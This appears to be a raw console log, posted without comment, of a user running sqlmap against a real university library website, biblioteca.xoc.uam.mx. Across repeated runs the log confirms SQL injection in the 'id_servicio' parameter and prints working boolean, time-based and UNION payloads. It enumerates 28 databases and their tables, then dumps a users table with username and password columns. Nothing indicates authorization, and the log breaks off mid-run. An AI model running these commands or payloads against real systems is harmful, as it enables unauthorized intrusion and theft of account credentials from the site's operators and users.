
hello world

  1.  
  2. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql --dbs
  3.          _
  4.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  5. |_ -| . | |     | .'| . |
  6. |___|_  |_|_|_|_|__,|  _|
  7.       |_|           |_|   http://sqlmap.org
  8.  
  9. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  10.  
  11. [*] starting at 17:06:24
  12.  
  13. [17:06:25] [INFO] testing connection to the target URL
  14. [17:06:28] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
  15. [17:06:29] [INFO] testing if the target URL is stable
  16. [17:06:30] [INFO] target URL is stable
  17. [17:06:30] [INFO] testing if GET parameter 'id_servicio' is dynamic
  18. [17:06:32] [INFO] confirming that GET parameter 'id_servicio' is dynamic
  19. [17:06:33] [INFO] GET parameter 'id_servicio' is dynamic
  20. [17:06:35] [INFO] heuristic (basic) test shows that GET parameter 'id_servicio' might be injectable (possible DBMS: 'MySQL')
  21. [17:06:36] [INFO] testing for SQL injection on GET parameter 'id_servicio'
  22. for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
  23. [17:08:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  24. [17:08:10] [INFO] GET parameter 'id_servicio' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Haz")
  25. [17:08:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
  26. [17:08:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
  27. [17:08:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
  28. [17:08:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
  29. [17:08:17] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
  30. [17:08:18] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause (JSON_KEYS)'
  31. [17:08:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
  32. [17:08:22] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
  33. [17:08:24] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
  34. [17:08:25] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
  35. [17:08:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
  36. [17:08:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
  37. [17:08:30] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
  38. [17:08:32] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause (FLOOR)'
  39. [17:08:33] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
  40. [17:08:37] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
  41. [17:08:38] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
  42. [17:08:40] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
  43. [17:08:41] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
  44. [17:08:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
  45. [17:08:44] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
  46. [17:08:45] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
  47. [17:08:47] [INFO] testing 'MySQL inline queries'
  48. [17:08:48] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
  49. [17:08:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  50. [17:08:51] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
  51. [17:08:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
  52. [17:08:54] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
  53. [17:08:55] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
  54. [17:08:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
  55. [17:09:10] [INFO] GET parameter 'id_servicio' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
  56. [17:09:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
  57. [17:09:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
  58. [17:09:14] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
  59. [17:09:23] [INFO] target URL appears to have 11 columns in query
  60. [17:09:49] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupción de una conexión existente por el host remoto'). sqlmap is going to retry the request(s)
  61. [17:09:49] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
  62. [17:10:10] [INFO] GET parameter 'id_servicio' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
  63. GET parameter 'id_servicio' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
  64. sqlmap identified the following injection point(s) with a total of 69 HTTP(s) requests:
  65. ---
  66. Parameter: id_servicio (GET)
  67.     Type: boolean-based blind
  68.     Title: AND boolean-based blind - WHERE or HAVING clause
  69.     Payload: id_servicio=19 AND 1397=1397
  70.  
  71.     Type: AND/OR time-based blind
  72.     Title: MySQL >= 5.0.12 AND time-based blind
  73.     Payload: id_servicio=19 AND SLEEP(5)
  74.  
  75.     Type: UNION query
  76.     Title: Generic UNION query (NULL) - 11 columns
  77.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  78. ---
  79. [17:13:23] [INFO] the back-end DBMS is MySQL
  80. web server operating system: Windows
  81. web application technology: PHP 5.2.3, Apache 2.2.4
  82. back-end DBMS: MySQL >= 5.0.12
  83. [17:13:23] [INFO] fetching database names
  84. [17:13:25] [INFO] the SQL query used returns 28 entries
  85. [17:13:27] [INFO] retrieved: information_schema
  86. [17:13:29] [INFO] retrieved: adq
  87. [17:13:30] [INFO] retrieved: aleph
  88. [17:13:32] [INFO] retrieved: areas_biblioteca
  89. [17:13:34] [INFO] retrieved: biblioteca_digital
  90. [17:13:35] [INFO] retrieved: cosei
  91. [17:13:37] [INFO] retrieved: cuentasxxi
  92. [17:13:39] [INFO] retrieved: descarteah
  93. [17:13:41] [INFO] retrieved: empleados
  94. [17:13:42] [INFO] retrieved: inegi
  95. [17:13:44] [INFO] retrieved: jornadas
  96. [17:13:45] [INFO] retrieved: libreria
  97. [17:13:47] [INFO] retrieved: libreria_antes_actualizacion
  98. [17:13:48] [INFO] retrieved: multimedia_registro
  99. [17:13:49] [INFO] retrieved: mysql
  100. [17:13:51] [INFO] retrieved: oai-uamx
  101. [17:13:52] [INFO] retrieved: phpmyadmin
  102. [17:13:54] [INFO] retrieved: pib
  103. [17:13:55] [INFO] retrieved: planes_bibliografia
  104. [17:13:57] [INFO] retrieved: proctec
  105. [17:13:58] [INFO] retrieved: recursos_electronicos
  106. [17:14:00] [INFO] retrieved: resguardos
  107. [17:14:01] [INFO] retrieved: revistas_electronicas
  108. [17:14:05] [INFO] retrieved: salas
  109. [17:14:06] [INFO] retrieved: sscbs
  110. [17:14:08] [INFO] retrieved: tesis
  111. [17:14:09] [INFO] retrieved: tesis_pruebas
  112. [17:14:11] [INFO] retrieved: test
  113. available databases [28]:
  114. [*] adq
  115. [*] aleph
  116. [*] areas_biblioteca
  117. [*] biblioteca_digital
  118. [*] cosei
  119. [*] cuentasxxi
  120. [*] descarteah
  121. [*] empleados
  122. [*] inegi
  123. [*] information_schema
  124. [*] jornadas
  125. [*] libreria
  126. [*] libreria_antes_actualizacion
  127. [*] multimedia_registro
  128. [*] mysql
  129. [*] oai-uamx
  130. [*] phpmyadmin
  131. [*] pib
  132. [*] planes_bibliografia
  133. [*] proctec
  134. [*] recursos_electronicos
  135. [*] resguardos
  136. [*] revistas_electronicas
  137. [*] salas
  138. [*] sscbs
  139. [*] tesis
  140. [*] tesis_pruebas
  141. [*] test
  142.  
  143. [17:14:11] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  144.  
  145. [*] shutting down at 17:14:11
  146.  
  147.  
  148. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D adq --tables
  157. [*] starting at 17:15:10
  158.  
  159. [17:15:10] [INFO] testing connection to the target URL
  160. sqlmap resumed the following injection point(s) from stored session:
  161. ---
  162. Parameter: id_servicio (GET)
  163.     Type: boolean-based blind
  164.     Title: AND boolean-based blind - WHERE or HAVING clause
  165.     Payload: id_servicio=19 AND 1397=1397
  166.  
  167.     Type: AND/OR time-based blind
  168.     Title: MySQL >= 5.0.12 AND time-based blind
  169.     Payload: id_servicio=19 AND SLEEP(5)
  170.  
  171.     Type: UNION query
  172.     Title: Generic UNION query (NULL) - 11 columns
  173.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  174. ---
  175. [17:15:12] [INFO] testing MySQL
  176. [17:15:14] [INFO] confirming MySQL
  177. [17:15:19] [INFO] the back-end DBMS is MySQL
  178. web server operating system: Windows
  179. web application technology: PHP 5.2.3, Apache 2.2.4
  180. back-end DBMS: MySQL >= 5.0.0
  181. [17:15:19] [INFO] fetching tables for database: 'adq'
  182. [17:15:22] [INFO] the SQL query used returns 48 entries
  183. [17:15:24] [INFO] retrieved: carreras
  184. [17:15:25] [INFO] retrieved: cotizaciones
  185. [17:15:27] [INFO] retrieved: cotizaciones_copy
  186. [17:15:28] [INFO] retrieved: donaciones
  187. [17:15:30] [INFO] retrieved: editoriales
  188. [17:15:31] [INFO] retrieved: email
  189. [17:15:32] [INFO] retrieved: estados_desicion
  190. [17:15:34] [INFO] retrieved: estados_email
  191. [17:15:36] [INFO] retrieved: estados_libro
  192. [17:15:37] [INFO] retrieved: estados_libro_pedido
  193. [17:15:39] [INFO] retrieved: estados_pedido
  194. [17:15:40] [INFO] retrieved: estados_proceso_libro
  195. [17:15:42] [INFO] retrieved: estados_solicitudes
  196. [17:15:43] [INFO] retrieved: evaluacion_proveedores
  197. [17:15:44] [INFO] retrieved: facturas
  198. [17:15:46] [INFO] retrieved: libros
  199. [17:15:48] [INFO] retrieved: libros_copy
  200. [17:15:49] [INFO] retrieved: libros_en_bodega
  201. [17:15:50] [INFO] retrieved: libros_presolicitudes
  202. [17:15:52] [INFO] retrieved: libros_solicitados_de_la_web
  203. [17:15:53] [INFO] retrieved: libros_solicitud
  204. [17:15:55] [INFO] retrieved: libros_solicitud_copy
  205. [17:15:56] [INFO] retrieved: libros_solicitudes
  206. [17:15:57] [INFO] retrieved: libros_solicitudes_copy
  207. [17:15:59] [INFO] retrieved: libros_solicitudes_pedidos
  208. [17:16:00] [INFO] retrieved: libros_solicitudes_pedidos_copy
  209. [17:16:02] [INFO] retrieved: listas_libros
  210. [17:16:04] [INFO] retrieved: listas_libros_copy
  211. [17:16:05] [INFO] retrieved: pedidos
  212. [17:16:07] [INFO] retrieved: pedidos_copy
  213. [17:16:08] [INFO] retrieved: pedidos_periodicos
  214. [17:16:10] [INFO] retrieved: periodicos
  215. [17:16:11] [INFO] retrieved: periodicos_pedido
  216. [17:16:13] [INFO] retrieved: pre_solicitudes
  217. [17:16:14] [INFO] retrieved: presupuestos
  218. [17:16:16] [INFO] retrieved: proveedores
  219. [17:16:17] [INFO] retrieved: proveedores_1
  220. [17:16:19] [INFO] retrieved: proveedores_revistas_periodicos
  221. [17:16:21] [INFO] retrieved: prueba
  222. [17:16:22] [INFO] retrieved: relacion_libros_web_libros_adq
  223. [17:16:24] [INFO] retrieved: relacion_solicitud_cotizacion_pedido
  224. [17:16:26] [INFO] retrieved: revistas
  225. [17:16:28] [INFO] retrieved: revistas_pedido
  226. [17:16:30] [INFO] retrieved: solicitudes
  227. [17:16:31] [INFO] retrieved: solicitudes_copy
  228. [17:16:33] [INFO] retrieved: solicitudes_de_la_web
  229. [17:16:34] [INFO] retrieved: tipos_de_material
  230. [17:16:36] [INFO] retrieved: usuarios
  231. Database: adq
  232. [48 tables]
  233. +--------------------------------------+
  234. | carreras                             |
  235. | cotizaciones                         |
  236. | cotizaciones_copy                    |
  237. | donaciones                           |
  238. | editoriales                          |
  239. | email                                |
  240. | estados_desicion                     |
  241. | estados_email                        |
  242. | estados_libro                        |
  243. | estados_libro_pedido                 |
  244. | estados_pedido                       |
  245. | estados_proceso_libro                |
  246. | estados_solicitudes                  |
  247. | evaluacion_proveedores               |
  248. | facturas                             |
  249. | libros                               |
  250. | libros_copy                          |
  251. | libros_en_bodega                     |
  252. | libros_presolicitudes                |
  253. | libros_solicitados_de_la_web         |
  254. | libros_solicitud                     |
  255. | libros_solicitud_copy                |
  256. | libros_solicitudes                   |
  257. | libros_solicitudes_copy              |
  258. | libros_solicitudes_pedidos           |
  259. | libros_solicitudes_pedidos_copy      |
  260. | listas_libros                        |
  261. | listas_libros_copy                   |
  262. | pedidos                              |
  263. | pedidos_copy                         |
  264. | pedidos_periodicos                   |
  265. | periodicos                           |
  266. | periodicos_pedido                    |
  267. | pre_solicitudes                      |
  268. | presupuestos                         |
  269. | proveedores                          |
  270. | proveedores_1                        |
  271. | proveedores_revistas_periodicos      |
  272. | prueba                               |
  273. | relacion_libros_web_libros_adq       |
  274. | relacion_solicitud_cotizacion_pedido |
  275. | revistas                             |
  276. | revistas_pedido                      |
  277. | solicitudes                          |
  278. | solicitudes_copy                     |
  279. | solicitudes_de_la_web                |
  280. | tipos_de_material                    |
  281. | usuarios                             |
  282. +--------------------------------------+
  283.  
  284. [17:16:36] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  285.  
  286. [*] shutting down at 17:16:36
  287.  
  288.  
  289. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D adq -T usuarios --columns
  298. [*] starting at 17:17:21
  299.  
  300. [17:17:22] [INFO] testing connection to the target URL
  301. sqlmap resumed the following injection point(s) from stored session:
  302. ---
  303. Parameter: id_servicio (GET)
  304.     Type: boolean-based blind
  305.     Title: AND boolean-based blind - WHERE or HAVING clause
  306.     Payload: id_servicio=19 AND 1397=1397
  307.  
  308.     Type: AND/OR time-based blind
  309.     Title: MySQL >= 5.0.12 AND time-based blind
  310.     Payload: id_servicio=19 AND SLEEP(5)
  311.  
  312.     Type: UNION query
  313.     Title: Generic UNION query (NULL) - 11 columns
  314.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  315. ---
  316. [17:17:24] [INFO] testing MySQL
  317. [17:17:24] [INFO] confirming MySQL
  318. [17:17:24] [INFO] the back-end DBMS is MySQL
  319. web server operating system: Windows
  320. web application technology: PHP 5.2.3, Apache 2.2.4
  321. back-end DBMS: MySQL >= 5.0.0
  322. [17:17:24] [INFO] fetching columns for table 'usuarios' in database 'adq'
  323. [17:17:26] [INFO] the SQL query used returns 5 entries
  324. [17:17:28] [INFO] retrieved: "id_usuario","smallint(4) unsigned"
  325. [17:17:29] [INFO] retrieved: "tipo","smallint(4)"
  326. [17:17:31] [INFO] retrieved: "usuario","varchar(50)"
  327. [17:17:33] [INFO] retrieved: "passwd","varchar(128)"
  328. [17:17:35] [INFO] retrieved: "nombre","varchar(100)"
  329. Database: adq
  330. Table: usuarios
  331. [5 columns]
  332. +------------+----------------------+
  333. | Column     | Type                 |
  334. +------------+----------------------+
  335. | id_usuario | smallint(4) unsigned |
  336. | nombre     | varchar(100)         |
  337. | passwd     | varchar(128)         |
  338. | tipo       | smallint(4)          |
  339. | usuario    | varchar(50)          |
  340. +------------+----------------------+
  341.  
  342. [17:17:35] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  343.  
  344. [*] shutting down at 17:17:35
  345.  
  346.  
  347. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D adq -T usuarios --columns --dump
  356. [*] starting at 17:18:43
  357.  
  358. [17:18:43] [INFO] testing connection to the target URL
  359. sqlmap resumed the following injection point(s) from stored session:
  360. ---
  361. Parameter: id_servicio (GET)
  362.     Type: boolean-based blind
  363.     Title: AND boolean-based blind - WHERE or HAVING clause
  364.     Payload: id_servicio=19 AND 1397=1397
  365.  
  366.     Type: AND/OR time-based blind
  367.     Title: MySQL >= 5.0.12 AND time-based blind
  368.     Payload: id_servicio=19 AND SLEEP(5)
  369.  
  370.     Type: UNION query
  371.     Title: Generic UNION query (NULL) - 11 columns
  372.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  373. ---
  374. [17:18:46] [INFO] testing MySQL
  375. [17:18:46] [INFO] confirming MySQL
  376. [17:18:46] [INFO] the back-end DBMS is MySQL
  377. web server operating system: Windows
  378. web application technology: PHP 5.2.3, Apache 2.2.4
  379. back-end DBMS: MySQL >= 5.0.0
  380. [17:18:46] [INFO] fetching columns for table 'usuarios' in database 'adq'
  381. [17:18:46] [INFO] the SQL query used returns 5 entries
  382. [17:18:46] [INFO] resumed: "id_usuario","smallint(4) unsigned"
  383. [17:18:46] [INFO] resumed: "tipo","smallint(4)"
  384. [17:18:46] [INFO] resumed: "usuario","varchar(50)"
  385. [17:18:46] [INFO] resumed: "passwd","varchar(128)"
  386. [17:18:46] [INFO] resumed: "nombre","varchar(100)"
  387. Database: adq
  388. Table: usuarios
  389. [5 columns]
  390. +------------+----------------------+
  391. | Column     | Type                 |
  392. +------------+----------------------+
  393. | id_usuario | smallint(4) unsigned |
  394. | nombre     | varchar(100)         |
  395. | passwd     | varchar(128)         |
  396. | tipo       | smallint(4)          |
  397. | usuario    | varchar(50)          |
  398. +------------+----------------------+
  399.  
  400. [17:18:46] [INFO] fetching columns for table 'usuarios' in database 'adq'
  401. [17:18:46] [INFO] the SQL query used returns 5 entries
  402. [17:18:46] [INFO] resumed: "id_usuario","smallint(4) unsigned"
  403. [17:18:46] [INFO] resumed: "tipo","smallint(4)"
  404. [17:18:46] [INFO] resumed: "usuario","varchar(50)"
  405. [17:18:46] [INFO] resumed: "passwd","varchar(128)"
  406. [17:18:46] [INFO] resumed: "nombre","varchar(100)"
  407. [17:18:46] [INFO] fetching entries for table 'usuarios' in database 'adq'
  408. [17:18:48] [INFO] the SQL query used returns 22 entries
  431. [17:19:22] [INFO] analyzing table dump for possible password hashes
  432. Database: adq
  433. Table: usuarios
  434. [22 entries]
  435. +------------+------+-----------+-----------------------------------+----------------+
  436. | id_usuario | tipo | passwd    | nombre                            | usuario        |
  437. +------------+------+-----------+-----------------------------------+----------------+
  460. +------------+------+-----------+-----------------------------------+----------------+
  461.  
  462. [17:19:22] [INFO] table 'adq.usuarios' dumped to CSV file 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx\dump\adq\usuarios.csv'
  463. [17:19:22] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  464.  
  465. [*] shutting down at 17:19:22
  466.  
  467.  
  468. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql --dbs
  477. [*] starting at 17:22:26
  478.  
  479. [17:22:26] [INFO] testing connection to the target URL
  480. sqlmap resumed the following injection point(s) from stored session:
  481. ---
  482. Parameter: id_servicio (GET)
  483.     Type: boolean-based blind
  484.     Title: AND boolean-based blind - WHERE or HAVING clause
  485.     Payload: id_servicio=19 AND 1397=1397
  486.  
  487.     Type: AND/OR time-based blind
  488.     Title: MySQL >= 5.0.12 AND time-based blind
  489.     Payload: id_servicio=19 AND SLEEP(5)
  490.  
  491.     Type: UNION query
  492.     Title: Generic UNION query (NULL) - 11 columns
  493.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  494. ---
  495. [17:22:28] [INFO] testing MySQL
  496. [17:22:28] [INFO] confirming MySQL
  497. [17:22:28] [INFO] the back-end DBMS is MySQL
  498. web server operating system: Windows
  499. web application technology: PHP 5.2.3, Apache 2.2.4
  500. back-end DBMS: MySQL >= 5.0.0
  501. [17:22:28] [INFO] fetching database names
  502. [17:22:28] [INFO] the SQL query used returns 28 entries
  503. available databases [28]:
  504. [*] adq
  505. [*] aleph
  506. [*] areas_biblioteca
  507. [*] biblioteca_digital
  508. [*] cosei
  509. [*] cuentasxxi
  510. [*] descarteah
  511. [*] empleados
  512. [*] inegi
  513. [*] information_schema
  514. [*] jornadas
  515. [*] libreria
  516. [*] libreria_antes_actualizacion
  517. [*] multimedia_registro
  518. [*] mysql
  519. [*] oai-uamx
  520. [*] phpmyadmin
  521. [*] pib
  522. [*] planes_bibliografia
  523. [*] proctec
  524. [*] recursos_electronicos
  525. [*] resguardos
  526. [*] revistas_electronicas
  527. [*] salas
  528. [*] sscbs
  529. [*] tesis
  530. [*] tesis_pruebas
  531. [*] test
  532.  
  533. [17:22:29] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  534.  
  535. [*] shutting down at 17:22:29
  536.  
  537.  
  538. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D biblioteca_digital --tables
  547. [*] starting at 17:22:47
  548.  
  549. [17:22:47] [INFO] testing connection to the target URL
  550. sqlmap resumed the following injection point(s) from stored session:
  551. ---
  552. Parameter: id_servicio (GET)
  553.     Type: boolean-based blind
  554.     Title: AND boolean-based blind - WHERE or HAVING clause
  555.     Payload: id_servicio=19 AND 1397=1397
  556.  
  557.     Type: AND/OR time-based blind
  558.     Title: MySQL >= 5.0.12 AND time-based blind
  559.     Payload: id_servicio=19 AND SLEEP(5)
  560.  
  561.     Type: UNION query
  562.     Title: Generic UNION query (NULL) - 11 columns
  563.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  564. ---
  565. [17:22:49] [INFO] testing MySQL
  566. [17:22:49] [INFO] confirming MySQL
  567. [17:22:49] [INFO] the back-end DBMS is MySQL
  568. web server operating system: Windows
  569. web application technology: PHP 5.2.3, Apache 2.2.4
  570. back-end DBMS: MySQL >= 5.0.0
  571. [17:22:49] [INFO] fetching tables for database: 'biblioteca_digital'
  572. [17:22:52] [INFO] the SQL query used returns 37 entries
  573. [17:22:54] [INFO] retrieved: articulos
  574. [17:22:56] [INFO] retrieved: articulos_autores
  575. [17:22:58] [INFO] retrieved: articulos_keywords
  576. [17:23:00] [INFO] retrieved: articulos_temas
  577. [17:23:02] [INFO] retrieved: autores
  578. [17:23:06] [INFO] retrieved: capitulos
  579. [17:23:07] [INFO] retrieved: capitulos_autores
  580. [17:23:09] [INFO] retrieved: coeditores
  581. [17:23:11] [INFO] retrieved: departamentos
  582. [17:23:12] [INFO] retrieved: dias
  583. [17:23:14] [INFO] retrieved: estadisticas
  584. [17:23:16] [INFO] retrieved: fasciculos
  585. [17:23:18] [INFO] retrieved: hosts
  586. [17:23:20] [INFO] retrieved: ipcountries
  587. [17:23:21] [INFO] retrieved: ipcountries_copy
  588. [17:23:23] [INFO] retrieved: keywords
  589. [17:23:25] [INFO] retrieved: libros
  590. [17:23:27] [INFO] retrieved: libros_autores
  591. [17:23:28] [INFO] retrieved: libros_coeditores
  592. [17:23:30] [INFO] retrieved: libros_copy1
  593. [17:23:32] [INFO] retrieved: libros_error00
  594. [17:23:34] [INFO] retrieved: libros_keywords
  595. [17:23:35] [INFO] retrieved: libros_original
  596. [17:23:37] [INFO] retrieved: libros_series
  597. [17:23:39] [INFO] retrieved: libros_subseries
  598. [17:23:40] [INFO] retrieved: libros_temas
  599. [17:23:42] [INFO] retrieved: lista_de_usuarios_bidi
  600. [17:23:44] [INFO] retrieved: lista_de_usuarios_revistas
  601. [17:23:45] [INFO] retrieved: revistas
  602. [17:23:47] [INFO] retrieved: revistas_copy
  603. [17:23:48] [INFO] retrieved: series
  604. [17:23:50] [INFO] retrieved: subseries
  605. [17:23:52] [INFO] retrieved: temas
  606. [17:23:53] [INFO] retrieved: temporal_libros
  607. [17:23:55] [INFO] retrieved: usuarios
  608. [17:23:57] [INFO] retrieved: usuarios_mig
  609. [17:23:58] [INFO] retrieved: visitas
  610. Database: biblioteca_digital
  611. [37 tables]
  612. +----------------------------+
  613. | articulos                  |
  614. | articulos_autores          |
  615. | articulos_keywords         |
  616. | articulos_temas            |
  617. | autores                    |
  618. | capitulos                  |
  619. | capitulos_autores          |
  620. | coeditores                 |
  621. | departamentos              |
  622. | dias                       |
  623. | estadisticas               |
  624. | fasciculos                 |
  625. | hosts                      |
  626. | ipcountries                |
  627. | ipcountries_copy           |
  628. | keywords                   |
  629. | libros                     |
  630. | libros_autores             |
  631. | libros_coeditores          |
  632. | libros_copy1               |
  633. | libros_error00             |
  634. | libros_keywords            |
  635. | libros_original            |
  636. | libros_series              |
  637. | libros_subseries           |
  638. | libros_temas               |
  639. | lista_de_usuarios_bidi     |
  640. | lista_de_usuarios_revistas |
  641. | revistas                   |
  642. | revistas_copy              |
  643. | series                     |
  644. | subseries                  |
  645. | temas                      |
  646. | temporal_libros            |
  647. | usuarios                   |
  648. | usuarios_mig               |
  649. | visitas                    |
  650. +----------------------------+
  651.  
  652. [17:23:59] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  653.  
  654. [*] shutting down at 17:23:59
  655.  
  656.  
  657. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql --dbs
  658.          _
  659.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  660. |_ -| . | |     | .'| . |
  661. |___|_  |_|_|_|_|__,|  _|
  662.       |_|           |_|   http://sqlmap.org
  663.  
  664. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  665.  
  666. [*] starting at 17:24:30
  667.  
  668. [17:24:31] [INFO] testing connection to the target URL
  669. sqlmap resumed the following injection point(s) from stored session:
  670. ---
  671. Parameter: id_servicio (GET)
  672.     Type: boolean-based blind
  673.     Title: AND boolean-based blind - WHERE or HAVING clause
  674.     Payload: id_servicio=19 AND 1397=1397
  675.  
  676.     Type: AND/OR time-based blind
  677.     Title: MySQL >= 5.0.12 AND time-based blind
  678.     Payload: id_servicio=19 AND SLEEP(5)
  679.  
  680.     Type: UNION query
  681.     Title: Generic UNION query (NULL) - 11 columns
  682.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  683. ---
  684. [17:24:33] [INFO] testing MySQL
  685. [17:24:33] [INFO] confirming MySQL
  686. [17:24:33] [INFO] the back-end DBMS is MySQL
  687. web server operating system: Windows
  688. web application technology: PHP 5.2.3, Apache 2.2.4
  689. back-end DBMS: MySQL >= 5.0.0
  690. [17:24:33] [INFO] fetching database names
